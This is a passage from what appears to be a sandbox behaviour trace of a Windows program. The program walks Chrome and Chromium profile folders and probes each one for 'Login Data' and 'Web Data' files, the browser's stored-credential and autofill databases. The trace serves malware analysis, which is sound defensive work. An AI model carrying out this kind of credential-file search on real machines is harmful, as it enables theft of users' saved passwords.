lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.347] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.347] wcslen (_String="Safe Browsing Csd Whitelist") returned 0x1b [0069.347] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.347] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.347] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.347] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing Csd Whitelist" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Csd Whitelist") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Csd Whitelist" [0069.347] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.347] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.347] wcslen (_String="Safe Browsing Download") returned 0x16 [0069.347] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.347] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.347] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.347] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing Download" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Download") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Download" [0069.347] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.347] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.347] wcslen (_String="Safe Browsing Download Whitelist") returned 0x20 [0069.347] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.347] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.347] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.347] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing Download Whitelist" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Download Whitelist") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Download Whitelist" [0069.347] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.347] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.347] wcslen (_String="Safe Browsing Extension Blacklist") returned 0x21 [0069.347] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.347] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.347] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.347] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing Extension Blacklist" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Extension Blacklist") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Extension Blacklist" [0069.347] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.347] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.347] wcslen (_String="Safe Browsing IP Blacklist") returned 0x1a [0069.348] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.348] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.348] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.348] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing IP Blacklist" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing IP Blacklist") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing IP Blacklist" [0069.348] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.348] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.348] wcslen (_String="Safe Browsing Module Whitelist") returned 0x1e [0069.348] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.348] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.348] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.348] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing Module Whitelist" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Module Whitelist") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Module Whitelist" [0069.348] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.348] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.348] wcslen (_String="Safe Browsing Resource Blacklist") returned 0x20 [0069.348] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.348] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.348] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.348] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing Resource Blacklist" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Resource Blacklist") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Resource Blacklist" [0069.348] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.348] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.348] wcslen (_String="Safe Browsing UwS List") returned 0x16 [0069.348] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.348] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.348] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.348] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing UwS List" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing UwS List") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing UwS List" [0069.348] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.348] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.348] wcslen (_String="Safe Browsing UwS List Prefix Set") returned 0x21 [0069.348] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.348] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.348] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.348] wcscat (in: _Dest=0x198d64, _Source="Safe Browsing UwS List Prefix Set" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing UwS List Prefix Set") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing UwS List Prefix Set" [0069.348] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.348] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.348] wcslen (_String="SSLErrorAssistant") returned 0x11 [0069.348] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.348] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.348] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.348] wcscat (in: _Dest=0x198d64, _Source="SSLErrorAssistant" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0069.348] wcscmp (_String1="SSLErrorAssistant", _String2="..") returned 1 [0069.348] wcscmp (_String1="SSLErrorAssistant", _String2=".") returned 1 [0069.348] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\web data")) returned 0xffffffff [0069.348] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 0x4d [0069.348] wcslen (_String="Login Data") returned 0xa [0069.348] wcscpy (in: _Dest=0x198660, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0069.349] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 0x4d [0069.349] wcscat (in: _Dest=0x198660, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\" [0069.349] wcscat (in: _Dest=0x198660, _Source="Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Login Data" [0069.349] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\login data")) returned 0xffffffff [0069.349] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.349] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.349] wcslen (_String="Subresource Filter") returned 0x12 [0069.349] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.349] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.349] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.349] wcscat (in: _Dest=0x198d64, _Source="Subresource Filter" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter" [0069.349] wcscmp (_String1="Subresource Filter", _String2="..") returned 1 [0069.349] wcscmp (_String1="Subresource Filter", _String2=".") returned 1 [0069.349] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\subresource filter\\web data")) returned 0xffffffff [0069.349] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter") returned 0x4e [0069.349] wcslen (_String="Login Data") returned 0xa [0069.349] wcscpy (in: _Dest=0x198660, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter" [0069.349] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter") returned 0x4e [0069.349] wcscat (in: _Dest=0x198660, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter\\" [0069.349] wcscat (in: _Dest=0x198660, _Source="Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter\\Login Data" [0069.349] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Subresource Filter\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\subresource filter\\login data")) returned 0xffffffff [0069.349] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.349] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.349] wcslen (_String="SwReporter") returned 0xa [0069.349] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.349] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.349] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.349] wcscat (in: _Dest=0x198d64, _Source="SwReporter" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" [0069.349] wcscmp (_String1="SwReporter", _String2="..") returned 1 [0069.349] wcscmp (_String1="SwReporter", _String2=".") returned 1 [0069.349] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\swreporter\\web data")) returned 0xffffffff [0069.349] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 0x46 [0069.349] wcslen (_String="Login Data") returned 0xa [0069.349] wcscpy (in: _Dest=0x198660, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" [0069.349] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 0x46 [0069.349] wcscat (in: _Dest=0x198660, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\" [0069.349] wcscat (in: _Dest=0x198660, _Source="Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Login Data" [0069.349] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\swreporter\\login data")) returned 0xffffffff [0069.350] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 1 [0069.350] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.350] wcslen (_String="WidevineCdm") returned 0xb [0069.350] wcscpy (in: _Dest=0x198d64, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data" [0069.350] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3b [0069.350] wcscat (in: _Dest=0x198d64, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\" [0069.350] wcscat (in: _Dest=0x198d64, _Source="WidevineCdm" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" [0069.350] wcscmp (_String1="WidevineCdm", _String2="..") returned 1 [0069.350] wcscmp (_String1="WidevineCdm", _String2=".") returned 1 [0069.350] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Web Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\web data")) returned 0xffffffff [0069.350] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 0x47 [0069.350] wcslen (_String="Login Data") returned 0xa [0069.350] wcscpy (in: _Dest=0x198660, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" [0069.350] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 0x47 [0069.350] wcscat (in: _Dest=0x198660, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\" [0069.350] wcscat (in: _Dest=0x198660, _Source="Login Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Login Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Login Data" [0069.350] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Login Data" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\login data")) returned 0xffffffff [0069.350] FindNextFileW (in: hFindFile=0x681bf0, lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 0 [0069.350] FindClose (in: hFindFile=0x681bf0 | out: hFindFile=0x681bf0) returned 1 [0069.350] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0069.350] wcslen (_String="Google\\Chrome SxS\\User Data") returned 0x1b [0069.350] wcscpy (in: _Dest=0x1994e8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" [0069.350] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0069.350] wcscat (in: _Dest=0x1994e8, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\" [0069.350] wcscat (in: _Dest=0x1994e8, _Source="Google\\Chrome SxS\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome SxS\\User Data" [0069.350] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned 0x3f [0069.350] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x198b14 | out: lpFindFileData=0x198b14) returned 0xffffffff [0069.350] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0069.350] wcslen (_String="Chromium\\User Data") returned 0x12 [0069.350] wcscpy (in: _Dest=0x1994e8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" [0069.350] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x23 [0069.350] wcscat (in: _Dest=0x1994e8, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\" [0069.350] wcscat (in: _Dest=0x1994e8, _Source="Chromium\\User Data" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Chromium\\User Data") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Chromium\\User Data" [0069.350] wcslen 